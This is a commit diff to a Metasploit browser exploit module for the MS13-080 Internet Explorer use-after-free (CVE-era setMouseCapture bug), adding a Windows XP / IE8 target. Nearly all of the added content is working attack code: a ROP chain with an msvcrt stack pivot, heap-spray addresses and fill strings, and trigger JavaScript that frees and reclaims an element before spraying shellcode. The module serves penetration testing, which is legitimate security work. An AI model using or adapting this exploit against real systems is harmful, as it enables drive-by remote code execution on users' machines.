Land rapid7#4213 - IE8 support for MS13-080

Author: wchen-r7

modules/exploits/windows/browser/ie_setmousecapture_uaf.rb

@@ -38,8 +38,9 @@ def initialize(info={})
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Unknown', # Exploit in the wild first spotted in Japan
-          'sinn3r'   # Metasploit (thx binjo for the heads up!)
+          'Unknown',      # Exploit in the wild first spotted in Japan
+          'sinn3r',       # Metasploit (thx binjo for the heads up!)
+          'Rich Lundeen'  # IE8 windows xp
         ],
       'References'     =>
         [
@@ -53,15 +54,27 @@ def initialize(info={})
       'Platform'       => 'win',
       'BrowserRequirements' =>
         {
-          :source    => /script/i,
-          :os_name   => 'Windows 7',
-          :ua_name   => HttpClients::IE,
-          :ua_ver    => "9.0",
-          :office    => /2007|2010/
+          :ua_name => HttpClients::IE,
+          :source  => /script/i
         },
       'Targets'        =>
         [
-          [ 'Automatic', {} ]
+          [ 'Automatic', {} ],
+          [
+            'Windows 7 with Office 2007|2010',
+            {
+              :os_name   => 'Windows 7',
+              :ua_ver    => "9.0",
+              :office    => /2007|2010/
+            }
+          ],
+          [
+            'Windows XP with IE 8',
+            {
+              :os_name   => 'Windows XP',
+              :ua_ver    => "8.0"
+            }
+          ]
         ],
       'Payload'        =>
         {
@@ -115,7 +128,7 @@ def get_payload(target_info)
     p
   end
 
-  def get_exploit_html(cli, target_info)
+  def get_exploit_html_ie9(cli, target_info)
     gadgets = {}
     case target_info[:office]
     when '2007'
@@ -237,9 +250,75 @@ def get_exploit_html(cli, target_info)
     |
   end
 
+  def get_exploit_html_ie8(cli, target_info)
+    code = payload.encoded
+
+    #address containing our heap spray is 0x20302020
+    spray_addr = "\\u2024\\u2030"
+
+    #size to fill after free is 0x50
+    free_fill = spray_addr + "\\u2424" * (((0x50-1)/2)-2)
+
+    rop = [
+      0x77c3868a,   # stack pivot in msvcrt || xchg eax, esp ; rcr dword [ebx-0x75], 0xFFFFFFC1 ; pop ebp ; ret  ;
+      0x20302020    # pointer to stack pivot
+    ].pack("V*")
+
+    rop << generate_rop_payload('msvcrt', code, { 'target'=>'WINDOWS XP SP3' }) << code
+
+    js_rop = Rex::Text.to_unescape(rop)
+
+    %Q|
+<html>
+<script>
+
+#{js_property_spray}
+
+tt = new Array(30);
+
+function trigger()
+{
+  var id_0 = document.createElement("sup");
+  var id_1 = document.createElement("audio");
+
+  document.body.appendChild(id_0);
+  document.body.appendChild(id_1);
+  id_1.applyElement(id_0);
+
+  id_0.onlosecapture=function(e) {
+    document.write("");
+
+    for(i = 0; i < tt.length; i++) {
+      tt[i] = document.createElement('div');
+      tt[i].className ="#{free_fill}";
+    }
+
+  var s = unescape("#{js_rop}");
+  sprayHeap({shellcode:s});
+  }
+
+  id_0['outerText']="";
+  id_0.setCapture();
+  id_1.setCapture();
+}
+
+window.onload = function() {
+  trigger();
+}
+</script>
+    |
+
+  end
+
   def on_request_exploit(cli, request, target_info)
-    html = get_exploit_html(cli, target_info)
+    case target_info[:ua_ver]
+    when "8.0"
+      html = get_exploit_html_ie8(cli, target_info)
+    when "9.0"
+      html = get_exploit_html_ie9(cli, target_info)
+    end
     send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
+
   end
 
 end
@@ -257,6 +336,13 @@ def on_request_exploit(cli, request, target_info)
   FileVersion:      2.05.50727.4039 (QFE.050727-4000)
 
 mshtml.dll
+
+  WinXP IE8 DLL info:
+  ProductVersion:   8.0.6001.18702
+  FileVersion:      8.0.6001.18702
+  FileDescription:  Microsoft (R) HTML Viewer
+
+  Win7 IE9 DLL info:
   ProductVersion:   9.00.8112.16446
   FileVersion:      9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)
   FileDescription:  Microsoft (R) HTML Viewer